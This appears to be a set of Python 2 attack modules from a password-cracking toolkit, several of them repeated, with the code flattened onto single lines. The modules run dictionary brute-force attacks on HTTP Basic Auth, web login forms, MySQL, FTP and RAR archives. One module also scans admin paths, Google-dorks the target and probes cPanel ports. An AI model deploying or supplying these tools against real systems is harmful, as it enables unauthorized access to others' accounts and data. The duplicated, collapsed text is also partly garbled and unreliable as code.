def main(run): isLive(init.var['target'], init.var['port']) Loadingfile(init.var['dict']) with open(init.var['dict'], 'r') as passwords: for password in passwords: password = password.replace("\n", "") connection = httplib.HTTPConnection(init.var['target'], init.var['port']) header = { "User-agent": RamdonAgent(), "Authorization": "Basic " + base64.b64encode(init.var['user'] + ":" + password) } connection.request("GET", init.var['path'], "", header) response = connection.getresponse() if response.status == 200: printAlert( 3, "Successfully with [" + init.var['user'] + "][" + password + "]\n") saveRegister(init, password) return else: printAlert(0, " | Checking '" + password + "'") printAlert(4, " No Result :c\n") # END CODE MODULE ############################################################################################
def request_thread(password): #@password : Password for Test in Service. global STATE params = urllib.urlencode({ init.var['data_a']: init.var['user'], init.var['data_b']: password }) header = { "Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain", "User-agent": RamdonAgent() } conn = httplib.HTTPConnection(init.var['target'], init.var['port']) conn.request(init.var['method'], init.var['file'], params, header) response = conn.getresponse() ver_source = response.read() if ver_source.find(init.var['alert']) != 0 and response.status == 200: printAlert( 3, "Successfully with [" + init.var['data_a'] + "=" + init.var['user'] + "][" + init.var['data_b'] + "=" + password + "]\n") saveRegister(init, password) STATE = True return True else: if STATE == False: printAlert(0, " | Checking '" + password + "'") # END CODE MODULE ############################################################################################
def main(run): isLive(init.var['target'], init.var['port']) Loadingfile(init.var['file']) Totalresults = "" printAlert(5, "[1] Step : Starting Brute Force...") with open(init.var['file'], 'r') as list_path: for path in list_path: path = "/" + path.replace("\n", "") connection = httplib.HTTPConnection(init.var['target'], init.var['port']) connection.addheaders = [('User-agent', RamdonAgent())] connection.request("GET", path) response = connection.getresponse() if response.status == 200 or response.status == 301: printAlert(3, " | Response " + init.var['target'] + path) Totalresults += "\t|" + init.var['target'] + path + "\n" else: printAlert( 0, " | Checking `" + colors[0] + path + "` Response:" + str(response.status)) printAlert(5, "[2] Step : Starting Google Dorking...") connection = httplib.HTTPConnection("www.google.com", 80) connection.request("GET", "/search?q=inurl:admin+site:" + str(init.var['target'])) connection.addheaders = [('User-agent', RamdonAgent())] response = connection.getresponse() soup = BeautifulSoup(response.read(), "lxml") divList = soup.findAll('cite') for ids in divList: printAlert(3, "| Result " + ids.text) Totalresults += "\t | " + ids.text + "\n" printAlert(5, "[3] Step : Scanning Port commons...") commonports = [2082, 2083, 2095, 2096] for port in commonports: printAlert(0, " | Testing Port " + str(port)) if isLive(init.var['target'], port): printAlert(3, " | " + str(port) + " Port Open!") Totalresults += "\t|" + str(port) + " Open! \n" printAlert(0, "[*] Total Result") print Totalresults saveRegister(init, Totalresults) # END CODE MODULE ############################################################################################
def main(run): isLive(init.var['target'],init.var['port']) Loadingfile(init.var['dict']) with open(init.var['dict'],'r') as passwords: for password in passwords: password=password.replace("\n","") try: MySQLdb.connect(init.var['target'],init.var['user'],password,'',int(init.var['port'])) if True: printAlert(3,"Successfully with ["+init.var['user']+"]["+password+"]\n") saveRegister(init,password) return except:printAlert(0," | Checking '"+password+"'") printAlert(4," No Result :c\n") # END CODE MODULE ############################################################################################
def main(run): Loadingfile(init.var['dict']) Arch = open(init.var['dict'],"r") leeArchivo = Arch.readlines() RARarch = RarFile(init.var['file']) for palabra in leeArchivo: palabraLlegada = palabra.split("\n") try: RARarch.extractall(pwd=str(palabraLlegada[0]),path="/root/home/") printAlert(3,"Successfully with ["+palabraLlegada[0]+"] -> /root/home/") saveRegister(init,palabraLlegada[0]) Space() return except:printAlert(0," | Checking '"+palabraLlegada[0]+"'") printAlert(4," No Result :c\n") # END CODE MODULE ############################################################################################
def main(run): isLive(init.var['target'],init.var['port']) Loadingfile(init.var['file']) Totalresults="" printAlert(5,"[1] Step : Starting Brute Force...") with open(init.var['file'],'r') as list_path: for path in list_path: path="/"+path.replace("\n","") connection = httplib.HTTPConnection(init.var['target'],init.var['port']) connection.addheaders=[('User-agent', RamdonAgent())] connection.request("GET",path) response = connection.getresponse() if response.status == 200 or response.status == 301: printAlert(3," | Response "+init.var['target']+path) Totalresults+="\t|"+init.var['target']+path+"\n" else:printAlert(0," | Checking `"+colors[0]+path+"` Response:"+str(response.status)) printAlert(5,"[2] Step : Starting Google Dorking...") connection = httplib.HTTPConnection("www.google.com",80) connection.request("GET", "/search?q=inurl:admin+site:"+str(init.var['target'])) connection.addheaders=[('User-agent', RamdonAgent())] response = connection.getresponse() soup = BeautifulSoup(response.read(), "lxml") divList = soup.findAll('cite') for ids in divList: printAlert(3,"| Result "+ids.text) Totalresults+="\t | "+ids.text+"\n" printAlert(5,"[3] Step : Scanning Port commons...") commonports = [2082,2083,2095,2096] for port in commonports: printAlert(0," | Testing Port "+str(port)) if isLive(init.var['target'],port): printAlert(3," | "+str(port)+" Port Open!") Totalresults+="\t|"+str(port)+" Open! \n" printAlert(0,"[*] Total Result") print Totalresults saveRegister(init,Totalresults) # END CODE MODULE ############################################################################################
def main(run): isLive(init.var['target'],init.var['port']) Loadingfile(init.var['dict']) with open(init.var['dict'],'r') as passwords: for password in passwords: password=password.replace("\n","") connection = httplib.HTTPConnection(init.var['target'],init.var['port']) header={"User-agent" : RamdonAgent(),"Authorization":"Basic "+base64.b64encode(init.var['user']+":"+password)} connection.request("GET",init.var['path'],"",header) response = connection.getresponse() if response.status == 200: printAlert(3,"Successfully with ["+init.var['user']+"]["+password+"]\n") saveRegister(init,password) return else:printAlert(0," | Checking '"+password+"'") printAlert(4," No Result :c\n") # END CODE MODULE ############################################################################################
def request_thread(password): #@password : Password for Test in Service. global STATE params = urllib.urlencode({init.var['data_a']: init.var['user'], init.var['data_b']: password}) header={"Content-type": "application/x-www-form-urlencoded","Accept": "text/plain" , "User-agent" : RamdonAgent()} conn = httplib.HTTPConnection(init.var['target'],init.var['port']) conn.request(init.var['method'], init.var['file'], params, header) response = conn.getresponse() ver_source = response.read() if ver_source.find(init.var['alert']) != 0 and response.status == 200: printAlert(3,"Successfully with ["+init.var['data_a']+"="+init.var['user']+"]["+init.var['data_b']+"="+password+"]\n") saveRegister(init,password) STATE = True return True else: if STATE==False:printAlert(0," | Checking '"+password+"'") # END CODE MODULE ############################################################################################
def main(run): isLive(init.var['target'],init.var['port']) Loadingfile(init.var['dict']) ftp = FTP() ftp.connect(init.var['target'],int(init.var['port'])) with open(init.var['dict'],'r') as passwords: for password in passwords: password=password.replace("\n","") try: ftp.login(init.var['user'],password) if True: printAlert(3,"Successfully with ["+init.var['user']+"]["+password+"]\n") Space() saveRegister(init,password) return except:printAlert(0," | Checking '"+password+"'") # END CODE MODULE ############################################################################################
def main(run): Loadingfile(init.var['dict']) Arch = open(init.var['dict'], "r") leeArchivo = Arch.readlines() RARarch = RarFile(init.var['file']) for palabra in leeArchivo: palabraLlegada = palabra.split("\n") try: RARarch.extractall(pwd=str(palabraLlegada[0]), path="/root/home/") printAlert( 3, "Successfully with [" + palabraLlegada[0] + "] -> /root/home/") saveRegister(init, palabraLlegada[0]) Space() return except: printAlert(0, " | Checking '" + palabraLlegada[0] + "'") printAlert(4, " No Result :c\n") # END CODE MODULE ############################################################################################